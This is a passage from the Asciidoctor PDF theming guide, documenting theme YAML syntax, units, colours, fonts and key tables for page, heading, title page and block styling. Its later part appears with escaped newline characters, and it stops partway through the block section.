As in most programming languages, multiply and divide take precedence over add and subtract.

The following table lists the supported operations and the corresponding operator for each.

[width=25%]
|===
|Operation |Operator

|multiply
|*

|divide
|/

|add
|+

|subtract
|-
|===

IMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).

Here's an example of a math expression with fixed values.

[source,yaml]
----
conum:
  line_height: 4 / 3
----

Variables may be used in place of numbers anywhere in the expression:

[source,yaml]
----
base:
  font_size: 12
  font_size_large: $base_font_size * 1.25
----

Values used in a math expression are automatically coerced to a float value before the operation.
If the result of the expression is an integer, the value is coerced to an integer afterwards.

IMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).

The theme language also supports several functions for rounding the result of a math expression.
The following functions may be used if they surround the whole
value or expression for a key.

round(...):: Rounds the number to the nearest half integer.
floor(...):: Rounds the number down to the previous integer.
ceil(...):: Rounds the number up to the next integer.

You might use these functions in font size calculations so that you get more exact values.

[source,yaml]
----
base:
  font_size: 12.5
  font_size_large: ceil($base_font_size * 1.25)
----

=== Measurement Units

Several of the keys require a value in points (pt), the unit of measure for the PDF canvas.
A point is defined as 1/72 of an inch.
If you specify a number without any units, the unit defaults to pt.

However, we humans like to think in real-world units like inches (in), centimeters (cm), or millimeters (mm).
You can let the theme do this conversion for you automatically by adding a unit notation next to any number.

The following units are supported:

[width=25%]
|===
|Unit |Suffix

|Centimeter
|cm

|Inches
|in

|Millimeter
|mm

|Percentage^[1]^
|%, vw, or vh

|Points
|pt (default)
|===

. A percentage with the % unit is calculated relative to the width or height of the content area.
Viewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.
Currently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.

IMPORTANT: Numbers with more than two digits should be written as a float (e.g., 100.0), a math expression (e.g., 1 * 100), or with a unit (e.g., 100pt).
Otherwise, the value may be misinterpreted as a hex color (e.g., '100') and could cause the converter to crash.

Here's an example of how you can use inches to define the page margins:

[source,yaml]
----
page:
  margin: [0.75in, 1in, 0.75in, 1in]
----

The order of elements in a measurement array is the same as it is in CSS:

. top
. right
. bottom
. left

=== Alignments

The align subkey is used to align text and images within the parent container.

==== Text Alignments

Text can be aligned as follows:

* left
* center
* right
* justify (stretched to each edge)

==== Image Alignments

Images can be aligned as follows:

* left
* center
* right

=== Font Styles

In most cases, wherever you can specify a custom font family, you can also specify a font style.
These two settings are combined to locate the font to use.

The following font styles are recognized:

* normal (no style)
* italic
* bold
* bold_italic

=== Text Transforms

In many places where font properties can be specified, a case transformation can also be applied to the text.
The following transforms are recognized:

* uppercase
* lowercase
* none (clears an inherited value)

[CAUTION#transform-unicode-letters]
====
Since Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.

If you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.

 $ gem install activesupport

or

 $ gem install unicode
====

// Additional transforms, such as capitalize, may be added in the future.

=== Colors

The theme language supports color values in the following formats:

Hex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes or both.
RGB:: An array of numeric values ranging from 0 to 255.
CMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.
Transparent:: The special value `transparent` indicates that a color should not be used.

==== Hex

The hex color value is likely most familiar to web developers.
The value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes or both.

To align with CSS, you may add a `+#+` in front of the hex color value.
A YAML preprocessor is used to ensure the value is not treated as a comment, as would normally be the case in YAML.

You also may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.
In this case, the leading `+#+` on a hex value is entirely optional.

Regardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.

The following are all equivalent values for the color red:

[cols="8*m"]
|===
|#ff0000
|#FF0000
|'ff0000'
|'FF0000'
|#f00
|#F00
|'f00'
|'F00'
|===

Here's how a hex color value appears in the theme file:

[source,yaml]
----
base:
  font_color: #ff0000
----

==== RGB

An RGB array value must be three numbers ranging from 0 to 255.
The values must be separated by commas and be surrounded by square brackets.

NOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].

Here's how to specify the color red in RGB:

* [255, 0, 0]

Here's how a RGB color value appears in the theme file:

[source,yaml]
----
base:
  font_color: [255, 0, 0]
----

==== CMYK

A CMYK array value must be four numbers ranging from 0 to 1 or from 0% to 100%.
The values must be separated by commas and be surrounded by square brackets.

Unlike the RGB array, the CMYK array _is not_ converted to a hex string
internally.
PDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.

Here's how to specify the color red in CMYK:

* [0, 0.99, 1, 0]
* [0, 99%, 100%, 0]

Here's how a CMYK color value appears in the theme file:

[source,yaml]
----
base:
  font_color: [0, 0.99, 1, 0]
----

==== Transparent

It's possible to specify no color by assigning the special value `transparent`, as shown here:

[source,yaml]
----
base:
  background_color: transparent
----

=== Images

An image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.
Images are currently resolved relative to the value of the `pdf-stylesdir` attribute.

The following image types (and corresponding file extensions) are supported:

* PNG (.png)
* JPEG (.jpg)
* SVG (.svg)

CAUTION: The GIF format (.gif) is not supported.

Here's how an image is specified in the theme file as a bare image path:

[source,yaml]
----
title_page:
  background_image: title-cover.png
----

In this case, the image is resolved relative to the theme directory.

Here's how the image is specified using the inline image macro:

[source,yaml]
----
title_page:
  background_image: image:title-cover.png[]
----

In this case, the image is resolved relative to the value of the `imagesdir` attribute.
Wrapping the value in the image macro sends a hint to the converter to resolve it just like other images.

Like in the AsciiDoc syntax, the inline image macro allows you to set the width of the image and the alignment:

[source,yaml]
----
title_page:
  logo_image: image:logo.png[width=250,align=center]
----

=== Quoted String

Some of the keys accept a quoted string as text content.
The final segment of these keys is always named `content`.

A content key accepts a string value.
It's usually best to quote the string or use the http://symfony.com/doc/current/components/yaml/yaml_format.html#strings[YAML multi-line string syntax].

Text content may be formatted using a subset of inline HTML.
You can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.
The `<span>` element supports the `style` attribute, which you can use to specify the `color`, `font-weight`, and `font-style` CSS properties.
You can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.
If you need to add an underline or strikethrough decoration to the text, you can assign the `underline` or `line-through` value to the `class` attribute on any aforementioned element.

Here's an example of using formatting in the content of the menu caret:

[source,yaml]
----
menu_caret_content: " <font size=\"1.15em\"><color rgb=\"#b12146\">\u203a</color></font> "
----

NOTE: The string must be double quoted in order to use a Unicode escape code like `\u203a`.

Additionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.

== Fonts

You can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.
If you want to use custom fonts, you must first declare
them in your theme file.

IMPORTANT: Asciidoctor has no challenge working with Unicode.
In fact, it prefers Unicode and considers the entire range.
However, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.
There's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.

=== Built-In (AFM) Fonts

The names of the built-in fonts (for general-purpose text) are as follows:

[width=33.33%]
|===
|Font Name |Font Family

|Helvetica
|sans-serif

|Times-Roman
|serif

|Courier
|monospace
|===

Using a built-in font requires no additional files.
You can use the key anywhere a `font_family` property is accepted in the theme file.
For example:

[source,yaml]
----
base:
  font_family: Times-Roman
----

However, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http://en.wikipedia.org/wiki/Windows-1252[Windows-1252]) code set.
WINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).
For anything outside of that, PDF is BYOF (Bring Your Own Font).

Even though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.
Asciidoctor PDF encodes the content into WINANSI when building the PDF.

CAUTION: Built-in fonts do not use the <<fallback-fonts,fallback fonts>>.
In order for the fallback font to kick in, you must be using a TrueType font.

.WINANSI Encoding Behavior
****
When using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logic "`not`" glyph (`¬`) and you'll see the following warning in your console:

 The following text could not be fully converted to the Windows-1252 character set:
 | <string with unknown glyph>

This behavior differs from the default behavior in Prawn, which simply crashes.

You'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.
To prevent this warning, you need to specify a TrueType font.

For more information about how Prawn handles character encodings for built-in fonts, see https://github.com/prawnpdf/prawn/blob/master/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].
****

=== Bundled Fonts

Asciidoctor PDF bundles several fonts that are used by the default theme.
You can also use these fonts in your custom theme by simply declaring them.
These fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8 (to reduce the size of the gem).

The family names of the fonts bundled with Asciidoctor PDF are as follows:

http://www.google.com/get/noto/#/family/noto-serif[Noto Serif]::
A serif font that can be styled as normal, italic, bold or bold_italic.

http://mplus-fonts.osdn.jp/mplus-outline-fonts/design/index-en.html#mplus_1mn[M+ 1mn]::
A monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.
Also provides the circled numbers used in callouts.

http://mplus-fonts.osdn.jp/mplus-outline-fonts/design/index-en.html#mplus_1p[M+ 1p Fallback]::
A sans-serif font that provides a very complete set of Unicode glyphs.
Cannot be styled as italic, bold or bold_italic.
Used as the fallback
font.

CAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).
This limitation may be lifted in the future.

=== Custom Fonts

The limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.
Custom fonts can enhance the look of your PDF theme substantially.

To start, you need to find a TTF file collection for the font you want to use.
A collection typically consists of all four styles of a font:

* normal
* italic
* bold
* bold_italic

You'll need all four styles to support AsciiDoc content properly.
_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so you need the italic style._

Once you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.
It's recommended that you name them consistently so it's easier to type the names in the theme file.

Let's assume the name of the font is https://github.com/google/roboto/tree/master/out/RobotoTTF[Roboto].
Name the files as follows:

* roboto-normal.ttf (_originally Roboto-Regular.ttf_)
* roboto-italic.ttf (_originally Roboto-Italic.ttf_)
* roboto-bold.ttf (_originally Roboto-Bold.ttf_)
* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)

Next, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
----

You can use the key that you assign to the font in the font catalog anywhere the `font_family` property is accepted in the theme file.
For instance, to use the Roboto font for all headings, you'd use:

[source,yaml]
----
heading:
  font_family: Roboto
----

When you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:

 $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path/to/fonts document.adoc

WARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.

When Asciidoctor PDF creates the PDF, it only embeds the glyphs from the font that are needed to render the characters present in the document.
In other words, Asciidoctor PDF automatically subsets the font.
However, if you're storing the fonts in a repository, you may want to subset the font (for instance, by using FontForge) to reduce the space the font occupies in that storage.
This is simply a personal preference.

You can add any number of fonts to the catalog.
Each font must be assigned a unique key, as shown here:

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
    Roboto Light:
      normal: roboto-light-normal.ttf
      italic: roboto-light-italic.ttf
      bold: roboto-light-bold.ttf
      bold_italic: roboto-light-bold_italic.ttf
----

TIP: Text in SVGs will use the font catalog from your theme.
We recommend that you match the font key to the name of the font seen by the operating system.
This will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF.

=== Fallback Fonts

If a TrueType font is missing a character needed to render the document,
such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.
You only need to specify a single fallback font, typically one that provides a full set of symbols.

IMPORTANT: The fallback font is only used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).
Any glyph missing from an AFM font is simply replaced with the "`not`" glyph (`¬`).

CAUTION: Using the fallback font slows down PDF generation slightly because it has to analyze every single character.
Its use is not recommended for large documents.
Instead, it's best to select primary fonts that have all the characters you need.
Keep in mind that the default theme currently uses a fallback font, though this may change in the future.

Like with other custom fonts, you first need to declare the fallback font.
Let's choose https://github.com/android/platform_frameworks_base/blob/master/data/fonts/DroidSansFallback.ttf[Droid Sans Fallback].
You can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
    DroidSansFallback:
      normal: droid-sans-fallback.ttf
      italic: droid-sans-fallback.ttf
      bold: droid-sans-fallback.ttf
      bold_italic: droid-sans-fallback.ttf
----

Next, add the key name to the `fallbacks` key under the `font` key.
The `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.
However, we recommend using a single fallback font, if possible, as shown here:

[source,yaml]
----
font:
  catalog:
    Roboto:
      normal: roboto-normal.ttf
      italic: roboto-italic.ttf
      bold: roboto-bold.ttf
      bold_italic: roboto-bold_italic.ttf
    DroidSansFallback:
      normal: droid-sans-fallback.ttf
      italic: droid-sans-fallback.ttf
      bold: droid-sans-fallback.ttf
      bold_italic: droid-sans-fallback.ttf
  fallbacks:
    - DroidSansFallback
----

TIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.

Of course, make sure you've configured your theme to use your custom font:

[source,yaml]
----
base:
  font_family: Roboto
----

That's it!
Now you're covered.
If your custom font is missing a glyph, Asciidoctor PDF will look in your fallback font.
You don't need to reference the fallback font anywhere else in your theme file.

== Keys

This section lists all the keys that are available when creating a custom theme.
The keys are organized by category.
Each category represents a common prefix under which the keys are typically nested.

TIP: Keys can be nested wherever an underscore (`_`) appears in the name.
This nested structure is for organizational purposes only.
All keys are flattened when the theme is loaded (e.g., `align` nested under `base` becomes `base_align`).

The converter uses the values of these keys to control how most elements are arranged and styled in the PDF.
The default values listed in this section get inherited from the https://github.com/asciidoctor/asciidoctor-pdf/blob/master/data/themes/base-theme.yml[base theme].

IMPORTANT: The https://github.com/asciidoctor/asciidoctor-pdf/blob/master/data/themes/default-theme.yml[default theme] has a different set of values which are not shown in this guide.

When creating a theme, all keys are optional.
Required keys are provided by the base theme.
Therefore, you
only have to declare keys that you want to override.

[#keys-page]
=== Page

The keys in this category control the size, margins and background of each page (i.e., canvas).
We recommend that you define this category before all other categories.

NOTE: The background of the title page can be styled independently.
See <<Title Page>> for details.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>

|background_color^[1]^
|<<colors,Color>> +
(default: #ffffff)
|page:
  background_color: #fefefe

|background_image^[1]^
|Inline image macro^[2]^ +
(default: _not set_)
|page:
  background_image: image:page-bg.png[]

|layout
|portrait {vbar} landscape +
(default: portrait)
|page:
  layout: landscape

|margin
|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +
(default: 36)
|page:
  margin: [0.5in, 0.67in, 1in, 0.67in]

|margin_inner^[3]^
|<<measurement-units,Measurement>> +
(default: 48)
|page:
  margin_inner: 0.75in

|margin_outer^[3]^
|<<measurement-units,Measurement>> +
(default: 24)
|page:
  margin_outer: 0.59in

|size
|https://github.com/prawnpdf/pdf-core/blob/0.6.0/lib/pdf/core/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +
(default: A4)
|page:
  size: Letter
|===

. Page background images are automatically scaled to fit within the bounds of the page.
+
NOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.
This limitation is due to a bug in Prawn 1.3.1.
The limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).
For more details, see http://discuss.asciidoctor.org/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].
. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.
. The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin_inner and margin_outer values.
These margins are used when the value `prepress` is assigned to the `media` document attribute.

[#keys-base]
=== Base

The keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.
We recommend that you define this category after the page category and before all other categories.

NOTE: While it's common to define additional keys in this category (e.g., `base_border_radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>

|align
|<<text-alignments,Text alignment>> +
(default: left)
|base:
  align: justify

|border_color
|<<colors,Color>> +
(default: #eeeeee)
|base:
  border_color: #eeeeee

// border_radius is a variable, not an official key
//|border_radius
//|<<values,Number>>
//|base:
//  border_radius: 4

|border_width
|<<values,Number>> +
(default: 0.5)
|base:
  border_width: 0.5

|font_color
|<<colors,Color>> +
(default: #000000)
|base:
  font_color: #333333

|font_family
|<<fonts,Font family name>> +
(default: Helvetica)
|base:
  font_family: Noto Serif

|font_size
|<<values,Number>> +
(default: 12)
|base:
  font_size: 10.5

// font_size_large is a variable, not an official key
//|font_size_large
//|<<values,Number>>
//|base:
//  font_size_large: 13

|font_size_min
|<<values,Number>> +
(default: 9)
|base:
  font_size_min: 6

// font_size_small is a variable, not an official key
//|font_size_small
//|<<values,Number>>
//|base:
//  font_size_small: 9

|font_style
|<<font-styles,Font style>> +
(default: normal)
|base:
  font_style: normal

|text_transform^[1]^
|none +
(default: none)
|base:
  text_transform: none

|line_height_length^[2]^
|<<values,Number>> +
(default: 13.8)
|base:
  line_height_length: 12

|line_height^[2]^
|<<values,Number>> +
(default: 1.15)
|base:
  line_height: >
    $base_line_height_length /
    $base_font_size
|===

. The `text_transform` key cannot be set globally.
Therefore, this key should not be used.
The value of `none` is implicit and is documented here for completeness.
. You should set one of `line_height` or `line_height_length`, then derive the value of the other using a calculation, as these are correlated values.
For instance, if you set `line_height_length`, then use `$base_line_height_length / $base_font_size` as the value of `line_height`.

[#keys-vertical-spacing]
=== Vertical Spacing

The keys in this category control the general spacing between elements where a more specific setting is not designated.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

|vertical_spacing
|<<values,Number>> +
(default: 12)
|vertical_spacing: 10
|===

[#keys-link]
=== Link

The keys in this category are used to style hyperlink text.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>

|font_color
|<<colors,Color>> +
(default: #0000ee)
|link:
  font_color: #428bca

|font_family
|<<fonts,Font family name>> +
(default: _inherit_)
|link:
  font_family: Roboto

|font_size
|<<values,Number>> +
(default: _inherit_)
|link:
  font_size: 9

|font_style
|<<font-styles,Font style>> +
(default: _inherit_)
|link:
  font_style: italic

|text_decoration
|none {vbar} underline {vbar} line-through +
(default: none)
|link:
  text_decoration: underline
|===

[#keys-literal]
=== (Inline) Literal

The keys in this category are used for inline monospaced text in prose and table cells.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>

|font_color
|<<colors,Color>> +
(default: _inherit_)
|literal:
  font_color: #b12146

|font_family
|<<fonts,Font family name>> +
(default: Courier)
|literal:
  font_family: M+ 1mn

|font_size
|<<values,Number>> +
(default: _inherit_)
|literal:
  font_size: 12

|font_style
|<<font-styles,Font style>> +
(default: _inherit_)
|literal:
  font_style: bold
|===

[#keys-heading]
=== Heading

The keys in this category control the style of most headings, including part titles, chapter titles, section titles, the table of contents title and discrete headings.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>

|align
|<<text-alignments,Text alignment>> +
(default: $base_align)
|heading:
  align: center

|font_color
|<<colors,Color>> +
(default: _inherit_)
|heading:
  font_color: #222222

|font_family
|<<fonts,Font family name>> +
(default: $base_font_family)
|heading:
  font_family: Noto Serif

// NOTE: heading_font_size is overridden by h<n>_font_size in base theme
//|font_size
//|<<values,Number>> +
//(default: $base_font_size)
//|heading:
//  font_size: 18

|font_style
|<<font-styles,Font style>> +
(default: bold)
|heading:
  font_style: bold

|text_transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|heading:
  text_transform: uppercase

|line_height
|<<values,Number>> +
(default: 1.15)
|heading:
  line_height: 1.2

|margin_top
|<<measurement-units,Measurement>> +
(default: 4)
|heading:
  margin_top: $vertical_spacing * 0.2

|margin_bottom
|<<measurement-units,Measurement>> +
(default: 12)
|heading:
  margin_bottom: 9.6

3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading_h<n> >>^[1]^

|align
|<<text-alignments,Text alignment>> +
(default: $heading_align)
|heading:
  h2_align: center

|font_color
|<<colors,Color>> +
(default: $heading_font_color)
|heading:
  h2_font_color: [0, 99%, 100%, 0]

|font_family
|<<fonts,Font family name>> +
(default: $heading_font_family)
|heading:
  h4_font_family: Roboto

|font_size^[2]^
|<<values,Number>> +
(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)
|heading:
  h6_font_size: $base_font_size * 1.7

|font_style
|<<font-styles,Font style>> +
(default: $heading_font_style)
|heading:
  h3_font_style: bold_italic

|text_transform
|<<text-transforms,Text transform>> +
(default: $heading_text_transform)
|heading:
  text_transform: lowercase
|===

. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.
. A font size is assigned to each heading level by the base theme.
If you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).

[#keys-title-page]
=== Title Page

The keys in this category control the style of the title page as well as the arrangement and style of the elements on it.

TIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.

[cols="3,4,5l"]
|===
|Key |Value Type |Example

3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title_page>>

|align
|<<text-alignments,Text alignment>> +
(default: center)
|title_page:
  align: right

|background_color^[1]^
|<<colors,Color>> +
(default: _inherit_)
|title_page:
  background_color: #eaeaea

|background_image^[1]^
|Inline image macro^[2]^ +
(default: _not set_)
|title_page:
  background_image: image:title.png[]

|font_color
|<<colors,Color>> +
(default: _inherit_)
|title_page:
  font_color: #333333

|font_family
|<<fonts,Font family name>> +
(default: _inherit_)
|title_page:
  font_family: Noto Serif

|font_size
|<<values,Number>> +
(default: _inherit_)
|title_page:
  font_size: 13

|font_style
|<<font-styles,Font style>> +
(default: _inherit_)
|title_page:
  font_style: bold

|text_transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|title_page:
  text_transform: uppercase

|line_height
|<<values,Number>> +
(default: 1.15)
|title_page:
  line_height: 1

3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title_page_logo>>

|align
|<<image-alignments,Image alignment>> +
(default: _inherit_)
|title_page:
  logo:
    align: right

|image
|Inline image macro^[2]^ +
(default: _not set_)
|title_page:
  logo:
    image: image:logo.png[pdfwidth=25%]

|top
|Percentage^[3]^ +
(default: 10%)
|title_page:
  logo:
    top: 25%

3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title_page_title>>

|font_color
|<<colors,Color>> +
(default: _inherit_)
|title_page:
  title:
    font_color: #999999

|font_family
|<<fonts,Font family name>> +
(default: _inherit_)
|title_page:
  title:
    font_family: Noto Serif

|font_size
|<<values,Number>> +
(default: 18)
|title_page:
  title:
    font_size: $heading_h1_font_size

|font_style
|<<font-styles,Font style>> +
(default: _inherit_)
|title_page:
  title:
    font_style: bold

|text_transform
|<<text-transforms,Text transform>> +
(default: _inherit_)
|title_page:
  title:
    text_transform: uppercase

|line_height
|<<values,Number>> +
(default: $heading_line_height)
|title_page:
  title:
    line_height: 0.9

|top
|Percentage^[3]^ +
(default: 40%)
|title_page:
  title:
    top: 55%

|margin_top
|<<measurement-units,Measurement>> +
(default: 0)
|title_page:
  title:
margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n title:\n margin_bottom: 5\n\n3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title_page_subtitle>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 14)\n|title_page:\n subtitle:\n font_size: $heading_h3_font_size\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: $heading_line_height)\n|title_page:\n subtitle:\n line_height: 1\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title_page_authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n authors:\n delimiter: '; '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n authors:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title_page:\n authors:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n authors:\n margin_bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title_page_revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n revision:\n delimiter: ': '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_size: $base_font_size_small\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n revision:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_bottom: 5\n|===\n\n. 
Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.\n. Percentage unit can be % (relative to content height) or vh (relative to page height).\n\n[#keys-prose]\n=== Prose\n\nThe keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).\nTypically, all the margin is placed on the bottom.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|prose:\n margin_top: 0\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|prose:\n margin_bottom: $vertical_spacing\n|===\n\n[#keys-block]\n=== Block\n\nThe keys in this category control the spacing around block elements when a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>\n\n\/\/|padding\n\/\/|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n\/\/|block:\n\/\/ padding: [12, 15, 12, 15]\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|block:\n margin_top: 6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|block:\n margin_bottom: 6\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"3*a\",grid=none,frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* 